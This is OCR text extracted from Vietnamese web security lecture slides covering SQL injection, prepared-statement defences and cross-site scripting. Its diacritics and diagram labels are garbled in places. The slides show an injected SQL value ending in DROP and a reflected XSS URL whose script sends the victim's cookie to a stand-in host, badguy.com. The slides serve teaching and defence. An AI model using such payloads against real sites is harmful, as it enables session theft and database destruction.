An toan Web
Trang 3
SQL injection
O SQL
m Structured Query Language
Trang 5SQL injection
11 Tan cong SQL Injection
m statement = “SELECT * FROM users
2 á „ 77
WHERE name = ' ” + userName +”;
Trang 7SQL injection
11 Tan cong SQL Injection
m statement = “SELECT * FROM users
2 á „ 77
WHERE name = ' ” + userName +”;
Dieu gi xay ra neu userName = hi';DROP
Trang 9SQL injection LI Biện pháp ngắn chặn m Mức lập trinh L1 Kiểm soát chặt chẽ đầu vào L1 Loại bỏ các ký tự đặc biệt = Ở mức CSDL L1 Dùng lệnh prepare để định dạng câu truy vấn
m Phan tich tinh cau truy vấn
L1 Phát hiện điêu kiện “1 = 1”
Trang 11Tan cong XSS
[11 Van dé: khong duyét dau vao “term”
http://victim.com/search.php ? term = <script> window.open( “http://badguy.com?cookie = “ + document.cookie ) </script>
LïI Điêu gi xảy ra nếu người dùng kích lên địa chi này
m Trinh duyệt đi đến victim.com/search.php
m victim.com tra vé <HTML> Results for <script> </
Script>
m Trinh duyệt gui cookie cua victim.com cho
Trang 12Tan cong XSS Example XSS Attack
5 Cookies stolen and uploaded to
attacker's server, or malicious code
downloaded and executed 1 Attacker uploads malicious
code to their web server makes request for malicious code 4 Victim's browser unknowingly ® Malicious Web a Ww SA si Victim D> Attacker
2 Attacker adds hyperlink to 3 Innocent victim accesses page XSS vulnerable web page containing attacker's hyperlink (via
(and possibly promotes Vulnerable Web Server directed link, search engine results
Trang 14Tan cong XSS L1 Khai thác m Đánh cắp cookie (người dùng, mật khẩu, đặc quyền, )
ã Thực thi các script trong trình duyệt như là
từ trang của nạn nhân
m Lay nhiém: sâu Samy trên mySpace.com Hậu quả
= 80 % lỗ hổng an ninh mạng được báo cáo